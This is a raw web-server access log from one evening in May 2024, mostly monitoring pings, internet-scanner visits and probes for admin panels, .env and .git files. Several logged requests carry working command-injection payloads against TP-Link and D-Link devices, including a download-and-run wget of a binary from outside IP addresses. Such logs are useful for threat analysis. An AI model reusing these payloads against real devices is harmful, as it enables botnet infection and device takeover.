164.90.229.185 - - [03/May/2024:20:40:19 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
164.90.229.199 - - [03/May/2024:20:40:19 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:20:40:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:41:09 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:20:41:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.117.60 - - [03/May/2024:20:41:57 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:20:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [03/May/2024:20:42:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.224.128.43 - - [03/May/2024:20:43:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.65.127.191 - - [03/May/2024:20:43:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.65.127.191 - - [03/May/2024:20:43:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
159.65.127.191 - - [03/May/2024:20:43:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:20:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:44:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
91.92.246.162 - - [03/May/2024:20:44:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 12; vivo 1907) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
212.91.246.72 - - [03/May/2024:20:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.73 - - [03/May/2024:20:45:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/May/2024:20:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:47:02 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:20:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:49:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:20:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:20:51:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
3.8.49.25 - - [03/May/2024:20:52:22 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:20:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:20:54:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:20:54:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:55:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:55:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.188.106 - - [03/May/2024:20:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:20:56:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:57:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:20:58:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:20:58:47 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:20:59:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [03/May/2024:20:59:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/May/2024:21:00:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:01:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:01:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.92.246.162 - - [03/May/2024:21:02:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 OPR/85.0.4341.79 (Edition Campaign 76)"
212.91.246.72 - - [03/May/2024:21:02:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [03/May/2024:21:03:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/May/2024:21:03:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:03:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:21:04:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.210.20 - - [03/May/2024:21:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:05:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/May/2024:21:05:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
52.211.81.69 - - [03/May/2024:21:05:53 +0200] "GET http://212.91.246.83:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
52.211.81.69 - - [03/May/2024:21:05:53 +0200] "GET http://212.91.246.83:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
52.211.81.69 - - [03/May/2024:21:05:53 +0200] "GET http://212.91.246.83:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
179.43.188.106 - - [03/May/2024:21:06:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
192.241.210.20 - - [03/May/2024:21:06:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:06:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:06:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:06:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
3.8.49.25 - - [03/May/2024:21:06:38 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:21:06:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.210.20 - - [03/May/2024:21:06:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.20 - - [03/May/2024:21:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/May/2024:21:07:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:08:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:09:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:21:09:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [03/May/2024:21:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.1.144.109 - - [03/May/2024:21:10:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:10:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:11:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.184.141.54 - - [03/May/2024:21:12:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
3.8.49.25 - - [03/May/2024:21:12:16 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:21:12:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [03/May/2024:21:13:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:13:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [03/May/2024:21:14:04 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [03/May/2024:21:14:05 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [03/May/2024:21:14:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:15:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:21:15:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:16:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.180.218.100 - - [03/May/2024:21:17:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/May/2024:21:17:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:17:57 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:21:18:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:19:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:20:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:21:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.142.132.161 - - [03/May/2024:21:21:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/May/2024:21:21:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [03/May/2024:21:22:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:21:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
195.1.144.109 - - [03/May/2024:21:23:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
3.8.49.25 - - [03/May/2024:21:23:48 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:21:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [03/May/2024:21:24:03 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 326 "-" "-"
103.245.236.120 - - [03/May/2024:21:24:04 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [03/May/2024:21:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [03/May/2024:21:25:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/May/2024:21:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.49.25 - - [03/May/2024:21:26:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:21:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:27:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [03/May/2024:21:28:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.224.128.43 - - [03/May/2024:21:28:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [03/May/2024:21:28:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/May/2024:21:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [03/May/2024:21:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.8.49.25 - - [03/May/2024:21:29:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [03/May/2024:21:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.217 - - [03/May/2024:21:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.217 - - [03/May/2024:21:30:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.217 - - [03/May/2024:21:30:21 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.217 - - [03/May/2024:21:30:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
91.92.246.162 - - [03/May/2024:21:30:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
212.91.246.72 - - [03/May/2024:21:30:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.230.19.125 - - [03/May/2024:21:30:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.19.125 - - [03/May/2024:21:30:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [03/May/2024:21:32:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "HELP" 501 319 "-" "-"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "abuse.xmco.fr"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.167.199 - - [03/May/2024:21:33:55 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 199.167.216.35.bc.googleusercontent.com - - [03/May/2024:21:33:55 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.167.199 - - [03/May/2024:21:33:56 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.167.199 - - [03/May/2024:21:33:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.167.199 - - [03/May/2024:21:33:56 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
198.235.24.240 - - [03/May/2024:21:34:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.240 - - [03/May/2024:21:34:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/May/2024:21:34:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:35:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:37:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.41 - - [03/May/2024:21:38:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/May/2024:21:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.204.4 - - [03/May/2024:21:39:58 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
192.241.204.4 - - [03/May/2024:21:40:32 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
192.241.204.4 - - [03/May/2024:21:40:44 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
212.91.246.72 - - [03/May/2024:21:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.65.127.191 - - [03/May/2024:21:41:05 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
192.241.204.4 - - [03/May/2024:21:41:31 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
194.165.16.76 - - [03/May/2024:21:41:42 +0200] "\x03" 501 316 "-" "-"
192.241.204.4 - - [03/May/2024:21:41:48 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
212.91.246.72 - - [03/May/2024:21:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.204.4 - - [03/May/2024:21:42:02 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
192.241.204.4 - - [03/May/2024:21:42:42 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
192.241.204.4 - - [03/May/2024:21:42:48 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
212.91.246.72 - - [03/May/2024:21:42:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.204.4 - - [03/May/2024:21:43:04 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
192.241.204.4 - - [03/May/2024:21:43:21 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
212.91.246.72 - - [03/May/2024:21:43:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:21:44:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
